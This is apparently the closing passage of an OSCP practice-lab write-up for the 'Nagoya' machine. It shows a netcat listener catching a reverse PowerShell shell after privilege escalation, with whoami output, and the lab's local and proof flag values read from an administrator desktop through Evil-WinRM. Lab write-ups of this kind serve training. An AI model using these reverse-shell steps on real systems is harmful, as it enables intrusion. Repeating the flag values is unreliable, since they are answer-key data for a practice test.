[+] CreateProcessAsUser() OK

nc收到反弹shell

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.45.193] from (UNKNOWN) [192.168.166.21] 50271
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nagoya-ind\nagoya$

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\Administrator\Desktop\proof.txt
fa2dba2c7bdff500c6f6ce31dfa6037e

Flag

1
2
3
4
5


*Evil-WinRM* PS C:\Users\Christopher.Lewis> type C:\local.txt
81950a6ba1771f388080cb994a7fcb33

type C:\Users\Administrator\Desktop\proof.txt
fa2dba2c7bdff500c6f6ce31dfa6037e